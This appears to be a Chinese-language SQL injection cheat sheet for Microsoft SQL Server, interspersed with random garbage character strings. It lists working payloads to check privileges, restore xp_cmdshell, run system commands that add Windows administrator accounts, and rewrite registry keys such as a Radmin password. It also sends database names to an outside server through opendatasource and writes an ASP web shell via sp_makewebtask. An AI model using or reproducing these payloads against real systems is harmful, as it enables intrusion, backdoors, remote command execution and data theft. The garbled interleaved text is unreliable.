//看看是什么权限的1 e2 O8 Q& f0 e; k+ v: R
and 1=(Select IS_MEMBER('db_owner'))
# p- e% Q; X% A! p3 x4 V$ i* [And char(124)%2BCast(IS_MEMBER('db_owner') as varchar(1))%2Bchar(124)=1 ;--$ R3 L+ l; c5 t9 i
1 [/ L, p. r3 C* I1 @8 f0 b//检测是否有读取某数据库的权限
7 v- \6 h4 W% Q% f4 {- }& mand 1= (Select HAS_DBACCESS('master'))
* i$ `: ^6 d# O% nAnd char(124)%2BCast(HAS_DBACCESS('master') as varchar(1))%2Bchar(124)=1 --$ @ y9 H0 |7 h+ I/ ~6 J7 n9 I& g
# ~/ ~" u7 S0 S4 I9 X |1 d( C i) i5 s
数字类型2 j3 T6 m2 t5 e; z) I
and char(124)%2Buser%2Bchar(124)=0* l' z" a6 f$ p% c# a0 |
* `7 _4 f) I5 D( a; \# A字符类型5 o: b9 E$ H0 p. H
' and char(124)%2Buser%2Bchar(124)=0 and ''='" R. |5 G7 Z5 o* M, H2 Y3 v
) i7 h( n; X: P) p s搜索类型( Z+ A# S) [% j
' and char(124)%2Buser%2Bchar(124)=0 and '%'='
. {+ J7 W9 s8 C. L" m, h. l9 q# k2 G( q, }/ r8 P) s" y9 O7 e7 z9 [' ?2 J
爆用户名
# V4 v2 Q5 e9 E3 P. o$ v' x! Gand user>0
! s* `3 a& i) M+ o9 b% o/ b: g' and user>0 and ''='5 ?/ ?& C: x% @" O4 G* y
0 H6 w& u9 j7 ~- [2 q8 F检测是否为SA权限
0 b5 h' q: y; o5 Kand 1=(select IS_SRVROLEMEMBER('sysadmin'));--3 L4 j" S; z1 B9 e* b6 Q7 h6 c
And char(124)%2BCast(IS_SRVROLEMEMBER(0x730079007300610064006D0069006E00) as varchar(1))%2Bchar(124)=1 --( a, |1 T r- `1 q
! S( u; J' y# R, p/ d
检测是不是MSSQL数据库
, s! i0 b& R' n; xand exists (select * from sysobjects);--5 M4 Q4 [! H7 @7 B4 _
& j5 m6 s0 z2 h, q! ?& n检测是否支持多行
; N0 d" {0 w2 A6 b& n! E;declare @d int;--
9 M, {0 [0 F" k3 O6 o: M! R/ N7 I
$ I3 ]- T2 E" m5 s+ b# {恢复 xp_cmdshell
+ Q7 a% f9 ^6 j* Q" @9 g;exec master..dbo.sp_addextendedproc 'xp_cmdshell','xplog70.dll';--
, \! b9 k4 s1 m+ k; t& e8 Z% f$ \9 y
% k& t- g' \, a0 w7 x% Y
select * from openrowset('sqloledb','server=192.168.1.200,1433;uid=test;pwd=pafpaf','select @@version')
. N5 c( U# k; u0 Z* Z A
x' ^2 `( V) i6 H0 j//-----------------------# I- y K9 W" \8 y
// 执行命令9 F1 ] ]" v7 A
//-----------------------( W1 b( P# D( T% p
首先开启沙盘模式:
6 x7 L" {" U8 |exec master..xp_regwrite 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Jet\4.0\Engines','SandBoxMode','REG_DWORD',1" K B. U; V: x
5 T+ y/ Q5 q- ^9 g9 Q' b然后利用jet.oledb执行系统命令7 N6 `/ P& i P+ _
select * from openrowset('microsoft.jet.oledb.4.0',';database=c:\winnt\system32\ias\ias.mdb','select shell("cmd.exe /c net user admin admin1234 /add")')0 `% q0 i$ b5 X. ?* a0 L$ N) R& Z
5 F9 b& V( y% `1 I' X. F1 { v
执行命令
6 H2 C, u& j+ L) P;DECLARE @shell INT EXEC SP_OAcreate 'wscript.shell',@shell OUTPUT EXEC SP_OAMETHOD @shell,'run',null, 'C:\WINNT\system32\cmd.exe /c net user paf pafpaf /add';--% C: A* B+ U0 Z9 V' e6 t
+ g5 _; G( c$ G+ h6 n$ }
EXEC [master].[dbo].[xp_cmdshell] 'cmd /c md c:\1111': b$ I" W1 H# j) _8 D& F
' F9 r) L) d6 q/ ?. P# b H/ ~
判断xp_cmdshell扩展存储过程是否存在:/ [! l( d- K! i: y) v; |
http://192.168.1.5/display.asp?keyno=188 and 1=(Select count(*) FROM master.dbo.sysobjects Where xtype = 'X' AND name = 'xp_cmdshell')5 f( F0 Q% k6 f2 h1 R+ f
, X% h- j0 m5 b3 L, w
写注册表! I+ `( _9 A0 L; Z8 o9 R: |+ X
exec master..xp_regwrite 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Jet\4.0\Engines','SandBoxMode','REG_DWORD',18 M" D; V+ k# N s& M
& p0 f) s1 |9 v4 i: \3 E9 Y4 a
REG_SZ
8 e2 `! v4 g, s3 d8 Q/ J4 v; P& z) V+ \
读注册表
: h6 a) J) r R8 u3 K% Cexec master..xp_regread 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon','Userinit'
8 R( o+ X! Q3 c* f0 G, P
4 h R# f- m, B8 M+ _" Y读取目录内容2 I, C9 r4 R- d6 d2 `
exec master..xp_dirtree 'c:\winnt\system32\',1,12 |9 z) l! ^$ B
- r: I; I6 {# M3 b6 ] f9 _1 E# k5 D( I4 \4 p
数据库备份! P/ r; p7 U2 O6 T: {
backup database pubs to disk = 'c:\123.bak' l4 H' K9 O- ~/ ?8 I/ x
4 \$ V9 j [2 @' v9 h//爆出长度- d; C$ G2 `. a: E# o
And (Select char(124)%2BCast(Count(1) as varchar(8000))%2Bchar(124) From D99_Tmp)=0 ;--3 O& Z: D* g0 P: x( I! K
7 G, ?8 x$ p- T' [
& x/ B+ t' G" t i7 b& z% f9 Q- \
! x, V) Y; y4 p2 A3 t更改sa口令方法:用sql综合利用工具连接后,执行命令:) j, S& [" r7 B" n0 @
exec sp_password NULL,'新密码','sa'
- h3 h- Y4 E; \5 d x; H5 n0 b
* _& o& c8 K. A2 f9 S添加和删除一个SA权限的用户test:
' a6 U2 G% g$ y7 D$ Iexec master.dbo.sp_addlogin test,9530772- h* a! ] @7 F
exec master.dbo.sp_addsrvrolemember test,sysadmin3 k2 S U* e) m- q/ z0 _# H
3 @" {. Q# N: t( j删除扩展存储过过程xp_cmdshell的语句:
# B2 N! _1 [# P+ Y* [) k: K0 wexec sp_dropextendedproc 'xp_cmdshell'0 q1 S- o7 M( m7 i# d
4 g( L- L; F/ M! G添加扩展存储过过程
( j+ S# N9 }8 Z* nEXEC [master]..sp_addextendedproc 'xp_proxiedadata', 'c:\winnt\system32\sqllog.dll') C z3 ]; X F
GRANT exec On xp_proxiedadata TO public
2 ~* s+ J5 F: k6 q: H) w. h q8 j. T7 o1 K5 {# r
9 g" \/ p- x1 ~# x# T: X# s
停掉或激活某个服务。" i/ o( \8 h0 y+ j$ `7 y/ v# k& i
6 ]0 w/ v- A* T: Kexec master..xp_servicecontrol 'stop','schedule'5 {. z* \; D; R2 I3 y# E
exec master..xp_servicecontrol 'start','schedule'
, t6 \, u0 O( \
# g2 S5 W# K, B3 Wdbo.xp_subdirs/ Y7 ?! d% F) P/ ~
. h" m% \+ I6 K
只列某个目录下的子目录。9 ^& {& T W2 Z& R5 F4 A0 W
xp_getfiledetails 'C:\Inetpub\wwwroot\SQLInject\login.asp'5 R4 v: c$ h6 Y( `% P# b, [: W/ D
) u$ c! ~; S- h1 V# j/ U
dbo.xp_makecab
# r" o! o; }1 @- d; Q2 }' z; H$ I% N/ \% J
将目标多个档案压缩到某个目标档案之内。
/ I/ v6 t, M/ Z: ]5 X+ ~所有要压缩的档案都可以接在参数列的最后方,以逗号隔开。
6 V. ^. ^5 T6 ~8 l! c! r
/ a* o8 a# C' [; I$ y. E4 |dbo.xp_makecab- M- ~' @& M- K% l8 m
'c:\test.cab','mszip',1,4 A" \. L4 o! ~$ ?6 M8 V4 ^
'C:\Inetpub\wwwroot\SQLInject\login.asp',
; U" I9 R; M# H; x$ ['C:\Inetpub\wwwroot\SQLInject\securelogin.asp'
( B6 p$ O0 B$ g# Z1 X |) k
- b1 \1 \: e$ R c. Z: t6 Axp_terminate_process
5 J! t2 w6 A, _: \& d x" ^
, e. t( s9 _5 Y! p8 @2 h9 f! w9 u! c停掉某个执行中的程序,但赋予的参数是 Process ID。
" f3 s' r2 j& o7 g利用”工作管理员”,透过选单「检视」-「选择字段」勾选 pid,就可以看到每个执行程序的 Process ID. | t T( u& u( n* p( |& |
2 Q. o: H1 ~8 K
xp_terminate_process 2484/ g& [1 |) Z( \3 W+ c0 w0 R
0 P1 d! \/ J/ o- j! k
xp_unpackcab: V& N! F5 i- I% y
' A9 ^) p* @9 p X# @解开压缩档。, N/ k( A. p! N6 X
( P& x1 s' b; s8 ?* Y2 B2 X
xp_unpackcab 'c:\test.cab','c:\temp',1: s5 l; G! R2 j( l$ p1 V6 w
9 k3 t; m' m u) q7 }' A: l: _7 D, J' x s4 R- k+ V. D
某机,安装了radmin,密码被修改了,regedit.exe不知道被删除了还是被改名了,net.exe不存在,没有办法使用regedit /e 导入注册文件,但是mssql是sa权限,使用如下命令 EXEC master.dbo.xp_regwrite 'HKEY_LOCAL_MACHINE','SYSTEM\RAdmin\v2.0\Server\Parameters','Parameter','REG_BINARY',0x02ba5e187e2589be6f80da0046aa7e3c 即可修改密码为12345678。如果要修改端口值 EXEC master.dbo.xp_regwrite 'HKEY_LOCAL_MACHINE','SYSTEM\RAdmin\v2.0\Server\Parameters','port','REG_BINARY',0xd20400 则端口值改为12343 H3 {) |3 P1 H) ?8 L' \
C' X: z. } `0 O" A% k2 v, icreate database lcx;
6 ~1 P& O: a. X' h$ MCreate TABLE ku(name nvarchar(256) null);9 H7 J+ C C4 O" o ~
Create TABLE biao(id int NULL,name nvarchar(256) null);6 D2 g3 f) A* O" C# n, Z$ k
) p) n! q, M- @
//得到数据库名; u" m, D& C" a+ M5 m) b
insert into opendatasource('sqloledb','server=211.39.145.163,1443;uid=test;pwd=pafpaf;database=lcx').lcx.dbo.ku select name from master.dbo.sysdatabases4 V5 m0 u+ h7 b; A- F
) p( i* o% _7 X+ W6 m+ ^4 a' K! n! @+ C- X: A- w- |4 b, d' S
//在Master中创建表,看看权限怎样' Y* Y3 \' Y9 g5 {7 X2 a: b+ E
Create TABLE master..D_TEST(id nvarchar(4000) NULL,Data nvarchar(4000) NULL);--! U2 d" |4 w: j9 e( y0 x
) m! k; G9 y8 [' u用 sp_makewebtask直接在web目录里写入一句话马:8 k- r/ x% A" N- Q! @) q+ j" l
http://127.0.0.1/dblogin123.asp?username=123';exec%20sp_makewebtask%20'd:\www\tt\88.asp','%20select%20''<%25execute(request("a"))%25>''%20';--& l" y1 D& c" Z1 j8 `" X
. B2 J3 \' p Z4 B7 k1 g
//更新表内容
% V# C, [% k5 x8 y6 MUpdate films SET kind = 'Dramatic' Where id = 123
! r! z R5 A2 t& P* ~' e/ _" t4 i; |
//删除内容! i2 W- h3 v) `/ V
delete from table_name where Stockid = 3 |